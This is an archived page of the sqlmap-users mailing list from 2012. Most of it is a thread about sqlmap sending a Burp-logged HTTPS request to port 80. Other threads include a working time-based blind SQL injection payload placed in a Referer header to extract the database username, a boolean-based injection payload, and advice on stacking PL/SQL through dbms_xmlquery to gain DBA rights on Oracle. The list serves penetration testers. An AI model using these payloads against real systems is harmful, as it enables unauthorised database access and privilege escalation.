sqlmap-users Mailing List for sqlmap (Page 49)
From: Dennis <kor...@ya...> - 2012-10-09 09:12:23
Hey, burp acts as you suspected. Here's an example of https://google.de logged from a burp pro v1.4.12:

======================================================
11:05:56 https://www.google.de:443 [173.194.35.184]
======================================================
GET / HTTP/1.1
Host: www.google.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: xxx
Pragma: no-cache
Cache-Control: no-cache
======================================================

The same goes for burp's "Copy to File" feature. I usually use the --force-ssl flag to circumvent this.

Cheers,
Dennis

On 09.10.2012 10:49, Miroslav Stampar wrote:
> Hi again.
>
> It's a preamble, but the request itself is down below. We process requests, not preambles. As we need to support generic LOG files, we are "hunting" for requests itself.
>
> If somebody could confirm that Burp really strips any HTTPS "tips" from the requests and just puts those in preambles (like in your case), I'll gladly do the "patching".
>
> Kind regards,
> Miroslav Stampar
>
> On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se...> wrote:
>> Hello Miroslav, there is a mention of port 443 in the request "preamble", see:
>>
>>> ======================================================
>>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>>> ======================================================
>>
>> That specific request came from HTTPS page and landed toward HTTP, I'm sure of that.
>>
>> I suggest sqlmap log parser should first look at the port in the request preamble and then send the request to this port - is that possible to implement?
>>
>> Regards
>> Karel
>>
>> On 9.10.2012 10:30, Miroslav Stampar wrote:
>>> Hi Karel.
>>>
>>> Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land.
>>>
>>> I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443)
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote:
>>>> Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):
>>>>
>>>> ======================================================
>>>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>>>> ======================================================
>>>> GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
>>>> Host: www.xxx.cz
>>>> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
>>>> Accept: image/png,image/*;q=0.8,*/*;q=0.5
>>>> Accept-Language: en-us,en;q=0.5
>>>> Accept-Encoding: gzip, deflate
>>>> Connection: keep-alive
>>>> Referer: https://www.xxx.cz/
>>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>>> Cache-Control: max-age=0
>>>> ======================================================
>>>>
>>>> Then I start sqlmap this way:
>>>>
>>>> ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz
>>>>
>>>> And sqlmap instead of sending request to https (443) port it will use http (80) port instead:
>>>>
>>>> ---------------------------------------------------------
>>>> [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
>>>> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
>>>> [13:21:55] [INFO] url 1:
>>>> GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
>>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>>> do you want to test this url? [Y/n/q]
>>>> > Y
>>>> [snip]
>>>> ---------------------------------------------------------
>>>>
>>>> Could you please fix this?
>>>>
>>>> Regards
>>>> Karel Marhoul
>>>>
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
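The preamble-aware parsing Karel proposes in this thread (take the scheme and port from Burp's "=====" preamble, since the request itself never mentions HTTPS or 443), written out as an added example in Python. This is not sqlmap's own code; the sample log is constructed from the excerpts quoted above plus two made-up entries, and the "request only" URL builder models the port-80 behaviour the thread reports.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log: the first entry mirrors the thread's excerpt, the
# second and third are invented to exercise an explicit non-default port and
# a preamble that omits the port altogether.
SAMPLE_LOG = """\
======================================================
12:40:22  https://www.xxx.cz:443  [81.91.80.92]
======================================================
GET /index.php?option=com_thumber&view=thumb HTTP/1.1
Host: www.xxx.cz
Referer: https://www.xxx.cz/
Cookie: theme_cookie=life; __utmc=148540003
Cache-Control: max-age=0

======================================================
11:05:56  http://intranet.example.test:8080  [10.0.0.5]
======================================================
GET /status HTTP/1.1
Host: intranet.example.test:8080
Connection: keep-alive

======================================================
11:06:10  https://shop.example.test  [10.0.0.6]
======================================================
GET /cart?id=7 HTTP/1.1
Host: shop.example.test

"""

PREAMBLE_RE = re.compile(r"^\d{2}:\d{2}:\d{2}\s+(?P<url>https?://\S+)\s+\[(?P<ip>[^\]]*)\]$")
SEPARATOR_RE = re.compile(r"^=+$")
REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d(?:\.\d)?$")
DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_burp_log(text):
    """Return one dict per logged request: scheme, port and IP come from the
    preamble line; method, target and headers from the request block after it."""
    entries = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        pre = PREAMBLE_RE.match(lines[i].strip())
        if not pre:
            i += 1
            continue
        parts = urlsplit(pre.group("url"))
        entry = {
            "scheme": parts.scheme,
            "preamble_host": parts.hostname,
            "preamble_port": parts.port or DEFAULT_PORTS[parts.scheme],
            "ip": pre.group("ip"),
            "method": None,
            "target": None,
            "headers": {},
        }
        i += 1
        # Skip the '=====' line that closes the preamble.
        while i < len(lines) and SEPARATOR_RE.match(lines[i].strip()):
            i += 1
        req = REQUEST_LINE_RE.match(lines[i].strip()) if i < len(lines) else None
        if req is None:
            continue  # preamble with no request block behind it: nothing to test
        entry["method"], entry["target"] = req.group("method"), req.group("target")
        i += 1
        # Header lines run until a blank line (or the next separator) ends the block.
        while i < len(lines) and lines[i].strip() and not SEPARATOR_RE.match(lines[i].strip()):
            name, _, value = lines[i].partition(":")
            entry["headers"][name.strip().lower()] = value.strip()
            i += 1
        entries.append(entry)
    return entries


def url_from_request_only(entry):
    """URL rebuilt from the request alone, as the thread reports sqlmap doing:
    the scheme is not visible, so it falls back to http and port 80."""
    host = entry["headers"].get("host") or entry["preamble_host"]
    if ":" not in host:
        host += ":80"
    return "http://%s%s" % (host, entry["target"])


def url_from_preamble(entry):
    """URL honouring the preamble: scheme from the preamble, port from an
    explicit Host header port when present, otherwise from the preamble."""
    host_header = entry["headers"].get("host") or entry["preamble_host"]
    host, _, port = host_header.partition(":")
    port = int(port) if port else entry["preamble_port"]
    return "%s://%s:%d%s" % (entry["scheme"], host, port, entry["target"])


if __name__ == "__main__":
    for e in parse_burp_log(SAMPLE_LOG):
        print("request only :", url_from_request_only(e))
        print("with preamble:", url_from_preamble(e))
```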
From: Karel M. <rez...@se...> - 2012-10-09 09:04:21
I could confirm this behavior with these versions of burp:

Burp Suite Professional 1.4.12
Burp Suite Professional 1.5rc3

Patch would be appreciated.

Regards
Karel

On 9.10.2012 10:49, Miroslav Stampar wrote:
> Hi again.
>
> It's a preamble, but the request itself is down below. We process requests, not preambles. As we need to support generic LOG files, we are "hunting" for requests itself.
>
> If somebody could confirm that Burp really strips any HTTPS "tips" from the requests and just puts those in preambles (like in your case), I'll gladly do the "patching".
>
> Kind regards,
> Miroslav Stampar
>
> On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se...> wrote:
>> Hello Miroslav, there is a mention of port 443 in the request "preamble", see:
>>
>>> ======================================================
>>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>>> ======================================================
>>
>> That specific request came from HTTPS page and landed toward HTTP, I'm sure of that.
>>
>> I suggest sqlmap log parser should first look at the port in the request preamble and then send the request to this port - is that possible to implement?
>>
>> Regards
>> Karel
>>
>> On 9.10.2012 10:30, Miroslav Stampar wrote:
>>> Hi Karel.
>>>
>>> Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land.
>>>
>>> I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443)
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote:
>>>> Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):
>>>>
>>>> ======================================================
>>>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>>>> ======================================================
>>>> GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
>>>> Host: www.xxx.cz
>>>> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
>>>> Accept: image/png,image/*;q=0.8,*/*;q=0.5
>>>> Accept-Language: en-us,en;q=0.5
>>>> Accept-Encoding: gzip, deflate
>>>> Connection: keep-alive
>>>> Referer: https://www.xxx.cz/
>>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>>> Cache-Control: max-age=0
>>>> ======================================================
>>>>
>>>> Then I start sqlmap this way:
>>>>
>>>> ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz
>>>>
>>>> And sqlmap instead of sending request to https (443) port it will use http (80) port instead:
>>>>
>>>> ---------------------------------------------------------
>>>> [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
>>>> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
>>>> [13:21:55] [INFO] url 1:
>>>> GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
>>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>>> do you want to test this url? [Y/n/q]
>>>> > Y
>>>> [snip]
>>>> ---------------------------------------------------------
>>>>
>>>> Could you please fix this?
>>>>
>>>> Regards
>>>> Karel Marhoul
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:49:22
Hi again.

It's a preamble, but the request itself is down below. We process requests, not preambles. As we need to support generic LOG files, we are "hunting" for requests itself.

If somebody could confirm that Burp really strips any HTTPS "tips" from the requests and just puts those in preambles (like in your case), I'll gladly do the "patching".

Kind regards,
Miroslav Stampar

On Tue, Oct 9, 2012 at 10:44 AM, Karel Marhoul <rez...@se...> wrote:
> Hello Miroslav, there is a mention of port 443 in the request "preamble", see:
>
>> ======================================================
>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>> ======================================================
>
> That specific request came from HTTPS page and landed toward HTTP, I'm sure of that.
>
> I suggest sqlmap log parser should first look at the port in the request preamble and then send the request to this port - is that possible to implement?
>
> Regards
> Karel
>
> On 9.10.2012 10:30, Miroslav Stampar wrote:
>> Hi Karel.
>>
>> Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land.
>>
>> I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443)
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote:
>>> Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):
>>>
>>> ======================================================
>>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>>> ======================================================
>>> GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
>>> Host: www.xxx.cz
>>> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
>>> Accept: image/png,image/*;q=0.8,*/*;q=0.5
>>> Accept-Language: en-us,en;q=0.5
>>> Accept-Encoding: gzip, deflate
>>> Connection: keep-alive
>>> Referer: https://www.xxx.cz/
>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>> Cache-Control: max-age=0
>>> ======================================================
>>>
>>> Then I start sqlmap this way:
>>>
>>> ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz
>>>
>>> And sqlmap instead of sending request to https (443) port it will use http (80) port instead:
>>>
>>> ---------------------------------------------------------
>>> [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
>>> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
>>> [13:21:55] [INFO] url 1:
>>> GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
>>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>>> do you want to test this url? [Y/n/q]
>>> > Y
>>> [snip]
>>> ---------------------------------------------------------
>>>
>>> Could you please fix this?
>>>
>>> Regards
>>> Karel Marhoul
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Karel M. <rez...@se...> - 2012-10-09 08:44:24
Hello Miroslav, there is a mention of port 443 in the request "preamble", see:

> ======================================================
> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
> ======================================================

That specific request came from HTTPS page and landed toward HTTP, I'm sure of that.

I suggest sqlmap log parser should first look at the port in the request preamble and then send the request to this port - is that possible to implement?

Regards
Karel

On 9.10.2012 10:30, Miroslav Stampar wrote:
> Hi Karel.
>
> Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land.
>
> I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443)
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote:
>> Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):
>>
>> ======================================================
>> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
>> ======================================================
>> GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
>> Host: www.xxx.cz
>> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
>> Accept: image/png,image/*;q=0.8,*/*;q=0.5
>> Accept-Language: en-us,en;q=0.5
>> Accept-Encoding: gzip, deflate
>> Connection: keep-alive
>> Referer: https://www.xxx.cz/
>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>> Cache-Control: max-age=0
>> ======================================================
>>
>> Then I start sqlmap this way:
>>
>> ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz
>>
>> And sqlmap instead of sending request to https (443) port it will use http (80) port instead:
>>
>> ---------------------------------------------------------
>> [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
>> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
>> [13:21:55] [INFO] url 1:
>> GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
>> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
>> do you want to test this url? [Y/n/q]
>> > Y
>> [snip]
>> ---------------------------------------------------------
>>
>> Could you please fix this?
>>
>> Regards
>> Karel Marhoul
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:30:31
Hi Karel.

Strictly speaking there is no bug here. If you take a look carefully into the HTTP request inside you'll see that there is no mention of either HTTPS nor 443 inside the request itself. It seems like the request came from the https page (referer header), but landed toward the HTTP land.

I would suggest you to just try to append the :443 to the Host header value (Host: www.xxx.cz -> Host: www.xxx.cz:443)

Kind regards,
Miroslav Stampar

On Sun, Oct 7, 2012 at 1:37 PM, Karel Marhoul <rez...@se...> wrote:
> Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):
>
> ======================================================
> 12:40:22 https://www.xxx.cz:443 [81.91.80.92]
> ======================================================
> GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
> Host: www.xxx.cz
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
> Accept: image/png,image/*;q=0.8,*/*;q=0.5
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: keep-alive
> Referer: https://www.xxx.cz/
> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
> Cache-Control: max-age=0
> ======================================================
>
> Then I start sqlmap this way:
>
> ./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz
>
> And sqlmap instead of sending request to https (443) port it will use http (80) port instead:
>
> ---------------------------------------------------------
> [13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
> [13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
> [13:21:55] [INFO] url 1:
> GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
> Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
> do you want to test this url? [Y/n/q]
> > Y
> [snip]
> ---------------------------------------------------------
>
> Could you please fix this?
>
> Regards
> Karel Marhoul

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:26:46
Hi Alton.

Please update to the latest revision and run sqlmap with the: -p referer.

Kind regards,
Miroslav Stampar

On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alt...@gm...> wrote:
> In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this.
>
> Code:
> GET /vulnwebapp/index.php?id=2 HTTP/1.1
> Host: 192.168.127.133
> Proxy-Connection: keep-alive
> User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
>
> FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root."
>
> Is there any way to get sqlmap to assist with this type of attack?
>
> Thanks,

--
Miroslav Stampar
http://about.me/stamparm
From: Alton J. <alt...@gm...> - 2012-10-07 21:25:13
In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this.

Code:
GET /vulnwebapp/index.php?id=2 HTTP/1.1
Host: 192.168.127.133
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root."

Is there any way to get sqlmap to assist with this type of attack?

Thanks,
From: Miroslav S. <mir...@gm...> - 2012-10-07 17:46:31
Hi Kyle.

You can find examples here [1] and here [2]. In short, in one run you'll need --tables to brute force table names and in other(s) --dump -T <table_name> to dump table of interest.

Kind regards,
Miroslav Stampar

[1] http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-testfire-testing-web-server.html
[2] http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html

On Fri, Oct 5, 2012 at 1:29 AM, kyle easter <kyl...@gm...> wrote:
> I do not really know how to use SQL map on MS access backend.
>
> I'm trying to test a website, But I'm stuck here
>
> sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=32 AND 1922=1922
>
> I would understand what to do if this was just a normal php server, and bring up the tables but this obviously is not the same.
>
> Can someone please help me?
>
> kyl...@gm...
> Regards!

--
Miroslav Stampar
http://about.me/stamparm
From: Karel M. <rez...@se...> - 2012-10-07 11:37:30
Hello, I came across a bug while using sqlmap with -l parameter. I have burp log file with following content (only one request to https port):

======================================================
12:40:22 https://www.xxx.cz:443 [81.91.80.92]
======================================================
GET /index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120 HTTP/1.1
Host: www.xxx.cz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.xxx.cz/
Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
Cache-Control: max-age=0
======================================================

Then I start sqlmap this way:

./sqlmap.py -l /root/burp.log --batch --threads=10 --scope=www.xxx.cz

And sqlmap instead of sending request to https (443) port it will use http (80) port instead:

---------------------------------------------------------
[13:21:55] [INFO] using regular expression 'www.xxx.cz' for filtering targets
[13:21:55] [INFO] sqlmap parsed 1 testable requests from the targets list
[13:21:55] [INFO] url 1:
GET http://www.xxx.cz:80/index.php?option=com_thumber&view=thumb&format=image&path=images/cups/web-xxx-klub_ikona-spion.jpg&newX=160&newY=120
Cookie: __utma=148540003.1998141124.1349164485.1349423437.1349599213.20; __utmz=148540003.1349164485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); theme_cookie=life; e6da1f1e61cfd387eff8fb211613796e=3c29965kggoo45p49dhrs1npq0; __utmc=148540003
do you want to test this url? [Y/n/q]
> Y
[snip]
---------------------------------------------------------

Could you please fix this?

Regards
Karel Marhoul
From: kyle e. <kyl...@gm...> - 2012-10-04 23:29:23
|
I do not really know how to use sqlmap on an MS Access backend. I'm trying to test a website, but I'm stuck here:

sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32 AND 1922=1922

I would understand what to do if this was just a normal PHP server, and bring up the tables, but this obviously is not the same. Can someone please help me?

kyl...@gm...

Regards! |
From: Chris O. <chr...@gm...> - 2012-10-04 12:28:07
|
Hi Bernardo

Thanks for a very comprehensive reply. Your ticket #16 is something I'm going to be doing very soon, I need more practice with this. I'll check out some of those aux modules too. The David Litchfield papers linked from one of your tickets are also interesting reading.

The user has the following privs:

SELECT * FROM session_privs; [11]:
[*] CREATE CLUSTER
[*] CREATE INDEXTYPE
[*] CREATE OPERATOR
[*] CREATE PROCEDURE
[*] CREATE SEQUENCE
[*] CREATE SESSION
[*] CREATE SYNONYM
[*] CREATE TABLE
[*] CREATE TRIGGER
[*] CREATE TYPE
[*] UNLIMITED TABLESPACE

So I think something should be possible here.

Regards
Chris

On 4 October 2012 12:27, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Chris,
>
> On 3 October 2012 21:33, Chris Oakley <chr...@gm...> wrote:
> > Hi All
> >
> > When I get an injection for an Oracle system on the back end, I can use
> > --sql-shell with no problems. However, if I try to use stacked queries
> > here, I get an error message from SQLMap saying that I can't do that unless
> > stacked queries are enabled, which as far as I know you can't do with
> > Oracle, so that makes sense.
>
> Web application programming languages like PHP, ASP, ASP.NET and JSP
> obviously have functions to query Oracle (or rely on ODBC/JDBC or
> similar drivers). Regardless, they do not interpret and stack up
> separate queries sequentially when a semi-colon (;) is provided, hence
> stacked queries SQL injection by default won't work.
> However, when the SQL injection is within an Oracle function and PL/SQL
> code is allowed, you can stack queries sequentially. We have an open
> ticket to deal with this,
> https://github.com/sqlmapproject/sqlmap/issues/16
>
> > However, I've been reading and it seems (I could be wrong here, still
> > playing) that from 8i to 11g R2 there are packages which allow execution of
> > anonymous PL/SQL blocks - dbms_xmlquery.newcontext() and
> > dbms_xmlquery.getxml(). These are accessible to public by default. So an
> > injection might be ?id=1 and (select dbms_xmlquery.newcontext('various;
> > stacked; queries;') from dual) is not null -- I've looked at SQLMap's
> > queries through a proxy and I don't think it does anything like this.
> > Again, I'm just reading up on this now so I could well be off base here.
>
> Correct. There are a few tricks as far as I am aware to stack queries
> in Oracle. This is one of those. sqlmap does not yet implement any of
> these.
>
> > Ultimately, I'm trying to use the injection to gain DBA privs. I'm playing
> > around manually at the moment but wondered if this is something SQLMap could
> > potentially do and doesn't (or I'm totally wrong!)
>
> Depending on the Oracle release and its version, you can leverage
> different PL/SQL injections in default functions/triggers to escalate
> your privileges to DBA. Metasploit has auxiliary modules for a number
> of these vulnerabilities, see here
> https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/sqli/oracle
> Look at the source code and forge your SQLi payload accordingly.
> We have an open ticket to automate DBA privilege escalation on Oracle,
> https://github.com/sqlmapproject/sqlmap/issues/29.
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949) |
From: Bernardo D. A. G. <ber...@gm...> - 2012-10-04 11:27:48
|
Hi Chris,

On 3 October 2012 21:33, Chris Oakley <chr...@gm...> wrote:
> Hi All
>
> When I get an injection for an Oracle system on the back end, I can use
> --sql-shell with no problems. However, if I try to use stacked queries
> here, I get an error message from SQLMap saying that I can't do that unless
> stacked queries are enabled, which as far as I know you can't do with
> Oracle, so that makes sense.

